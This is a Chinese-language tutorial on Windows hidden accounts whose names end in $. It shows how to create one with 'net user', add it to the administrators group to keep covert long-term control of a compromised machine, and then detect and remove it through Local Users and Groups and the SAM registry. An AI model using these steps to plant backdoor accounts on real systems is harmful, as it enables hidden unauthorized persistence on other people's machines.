Windows系统的普通用户比管理员用户少很多「权限」,比如无法更改系统设置、安装软件、访问所有文件、更改其他用户账户等。
因此,黑客在拿到机器权限后,通常会创建一个「隐藏」的具有「管理员权限」的后门账户,实现长期控制。
Windows隐藏账户
- 1、什么是隐藏账户?
- 2、查看隐藏账户
- 3、实战演示
- 3.1、普通用户的权限问题
- 3.2、创建隐藏账户
- 3.3、添加到administrators组
- 3.4、验证权限
- 4、清理隐藏账户
1、什么是隐藏账户?
「隐藏账户」的用户名以$结尾,比如 tom$。
命令行无法看到隐藏账户,但可以正常登录,具有隐蔽性。
2、查看隐藏账户
1)win + r 输入 打开本地用户和组,可以看到隐藏账户。
2)win + r 输入 regedit 打开注册表,找到 KLM\SAM\SAM\Domains\Account\Users\Names\
默认没有权限查看SAM注册表
右键权限,给administrators添加权限。
重新打开注册表,可以看到隐藏账户。
3、实战演示
net user tom /add 创建一个普通账户。
注销,使用用户tom登录。
3.1、普通用户的权限问题
whoami # 查看当前登录用户
net user tom # 查看用户tom的信息
net user test /add # 创建一个用户
- 1
- 2
- 3
现在用户在Users组,创建用户提示拒绝访问,也就是没有权限。
右键管理员身份启动cmd,还要输入administrator的密码,后面如果冤大头把密码改了,我们就无法控制。
net user 能看到创建的用户,有点基础就能发现,隐秘性不好。
注销,登录administrator。
3.2、创建隐藏账户
net user tom01$ 123.qwertyuiop /add # 创建隐藏账户
net user # 查看所有账户
- 1
- 2
命令行看不到,具有隐蔽性。
3.3、添加到administrators组
net localgroup administrators tom01$ /add # 添加用户到administrators组
net user tom01$ # 查看用户信息
- 1
- 2
注销,登录tom01$账户。
3.4、验证权限
右键以管理员身份打开cmd,不再需要输入administrator的密码。
whoami # 当前登录账户
net user tom /del # 删除(开头创建的)账户
net user # 查看所有账户
- 1
- 2
- 3
可以更改其他账户,确认拥有管理员权限。
到这里,我们成功创建了管理员权限账户,并且实现了隐蔽性。
注销,登录administrator。
4、清理隐藏账户
net user tom01$ /del 删除隐藏账户
本地用户和组、SAM注册表里已经不见了。
注销,再登录,已经无法登录,确认隐藏账户已清除。